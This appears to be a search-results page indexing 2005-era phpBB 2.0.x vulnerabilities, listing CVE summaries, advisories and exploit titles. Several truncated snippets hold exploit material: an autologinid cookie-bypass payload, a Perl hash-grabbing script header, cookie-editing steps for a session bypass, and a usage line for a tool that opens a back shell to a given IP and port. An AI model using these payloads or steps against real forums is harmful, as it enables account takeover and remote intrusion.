217 matches found
phpBB 2.0.13 - downloads.php mod Get Hash
phpBB 2.0.13 - downloads.php mod Get Hash !/usr/bin/perl -w use IO::Socket; Example: C:\phpbb.pl www.site.com /phpBB2/ 2 downloads.php mod in phpBB \n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " - site address\n"; print " - forum folder\n"; print " - user id 2 default for phpBB...
phpBB <= 2.0.12 Change User Rights Authentication Bypass
Exploit for unknown platform in category web applications ======================================================== phpBB new ; my $cookiejar = HTTP::Cookies-new ; $browser-cookiejar $cookiejar ; $cookiejar-setcookie "0","phpbb2mysqldata", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B...
phpbb <= 2.0.12 uid vuln + admin_styles.php php code injection exploit
phpbbexp.exe http://site.com/phpbb/ backshell ip backshell port coded by Malloc0 Wicked Attitude tested on phpbb 2.0.11 C:dtcphpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888 nom du cookie recuperer : phpbb2mysql SESSION ID recuperЪ ... 06bef5092f9d369f13107684f63a3499...
CVE-2005-0259
phpBB 2.0.11, and possibly other versions, with remote avatars and avatar uploading enabled, allows local users to read arbitrary files by providing both a local and remote location for an avatar, then modifying the "Upload Avatar from a URL:" field to reference the target file...
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)
No description provided by source. phpBB 2.0.12 Session Handling Authentication Bypass .. easy to use exploit .. YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.. 1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made : 3- Close the Browser .. 2- Open the cookies.t...
CVE-2005-0673
Cross-site scripting (XSS) vulnerability in usercp_register.php for phpBB 2.0.13 allows remote attackers to inject arbitrary web script or HTML by setting the (1) allowhtml, (2) allowbbcode, or (3) allowsmilies parameters to inject HTML into signatures for personal messages, possibly when they are process...
CVE-2005-0659
phpBB 2.0.13 and earlier allows remote attackers to obtain sensitive information via a direct request to oracle.php, which reveals the path in a PHP error message...
-==phpBB 2.0.13 Full path disclosure==-
Neo Security Team NST® - Advisory 09 - 03/03/05; Program: phpBB 2.0.13; Homepage: http://www.phpbb.com; Vulnerable Versions: phpBB 2.0.13 & Lower versions; Risk: Low Risk!!; Impact: Full...
CVE-2005-0614
sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie...
CVE-2005-0603
viewtopic.php in phpBB 2.0.12 and earlier allows remote attackers to obtain sensitive information via a highlight parameter containing invalid regular expression syntax, which reveals the path in a PHP error message...
phpBB < 2.0.13 Cookie Authentication Bypass
Binary data 2658.prm...
phpBB 2.0.x - Authentication Bypass (3)
phpBB 2.0.x - Authentication Bypass (3) source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability...
phpBB 2.0.x - Authentication Bypass (2)
phpBB 2.0.x - Authentication Bypass (2) source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability...
phpBB 2.0.x - Authentication Bypass (1)
phpBB 2.0.x - Authentication Bypass (1) // source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerabilit...
phpBB 2.0.x - Authentication Bypass (2)
source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would permit unauthorized access to any...
phpBB 2.0.x - Authentication Bypass (1)
// source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would permit unauthorized access to...
phpBB 2.0.x - Authentication Bypass (3)
source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would permit unauthorized access to any...
phpbb -- Insufficient check against HTML code in usercp_register.php
Neo Security Team reports: If we specify a variable in the html code (any type: hidden, text, radio, check, etc) with the name allowhtml, allowbbcode or allowsmilies, is going to be on the html, bbcode and smilies in our signature. This is a low risk vulnerability that allows users to bypass...
phpBB vulnerable to file disclosure
Overview: The phpBB input validation methods may fail to sanitize user input, resulting in a disclosure of arbitrary file data. Description: phpBB is a customizable open source bulletin board package. It contains functionality that allows users to specify graphic files for use as "avatars." These...